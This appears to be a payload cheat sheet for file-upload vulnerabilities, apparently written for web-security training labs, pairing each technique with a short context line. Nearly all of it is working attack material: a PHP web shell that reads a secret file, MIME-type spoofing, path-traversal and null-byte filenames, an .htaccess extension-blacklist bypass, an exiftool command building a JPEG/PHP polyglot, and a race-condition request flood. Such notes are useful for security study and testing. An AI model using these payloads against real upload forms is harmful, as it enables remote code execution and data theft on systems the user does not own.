##### File Upload β Direct `.php` avatar upload (no validation)
```http
Content-Disposition: form-data; name="avatar"; filename="exploit.php"
Content-Type: application/x-php
<?php echo file_get_contents('/home/carlos/secret'); ?>
```
Context: Raw multipart part in `POST /my-account/avatar` (no filters)
Encoding: None β file stored verbatim in `/files/avatars/`
Source: [[1. Remote code execution via web shell upload]]
---
##### File Upload β MIME-type spoof (`image/jpeg`)
```http
Content-Disposition: form-data; name="avatar"; filename="exploit.php"
Content-Type: image/jpeg β spoofed
```
Context: MIME-restricted uploader; backend trusts `Content-Type` header
Encoding: None β only header value spoofed
Source: [[2. Web shell upload via Content-Type restriction bypass]]
---
##### File Upload β Path traversal in `filename`
```
filename="..%2fexploit.php"
```
Context: Multipart `filename` parameter; `%2f` decoded to `/` β file saved one level up (`/files/exploit.php`)
Encoding: URL-encoded slash to bypass naΓ―ve `../` stripping
Source: [[3. Web shell upload via path traversal]]
---
##### File Upload β Extension blacklist bypass with `.htaccess`
**.htaccess payload**
```
AddType application/x-httpd-php .l33t
```
**Follow-up shell**
```http
filename="exploit.l33t"
<?php echo file_get_contents('/home/carlos/secret'); ?>
```
Context: First upload `.htaccess`, then any file with `.l33t` extension
Encoding: Plain text; leverages Apache `AddType` directive
Source: [[4. Web shell upload via extension blacklist bypass]]
---
##### File Upload β Null-byte extension obfuscation
```
filename="exploit.php%00.jpg"
```
Context: Filename validated before URL-decode; `%00` β `\x00` truncates `.jpg`, leaves `.php` on disk
Encoding: URL-encoded null byte (%00)
Source: [[5. Web shell upload via obfuscated file extension]]
---
##### File Upload β JPEG / PHP polyglot (EXIF comment)
```bash
exiftool -Comment="<?php echo 'START '.file_get_contents('/home/carlos/secret').' END'; ?>" avatar.jpg -o polyglot.php
```
Context: Real JPEG magic bytes satisfy content inspection; `.php` extension triggers execution
Encoding: PHP payload embedded inside EXIF `Comment` field
Source: [[6. Remote code execution via polyglot web shell upload]]
---
##### File Upload β TOCTOU race (upload β GET flood)
```python
engine.queue(post_shell, gate='race')
for _ in range(50):
engine.queue(get_shell, gate='race')
engine.openGate('race')
```
Context: File is publicly readable after `move_uploaded_file()` but before validation+`unlink()`
Encoding: None β relies on timing; multiple GETs hit the tiny window
Source: [[7. Web shell upload via race condition]]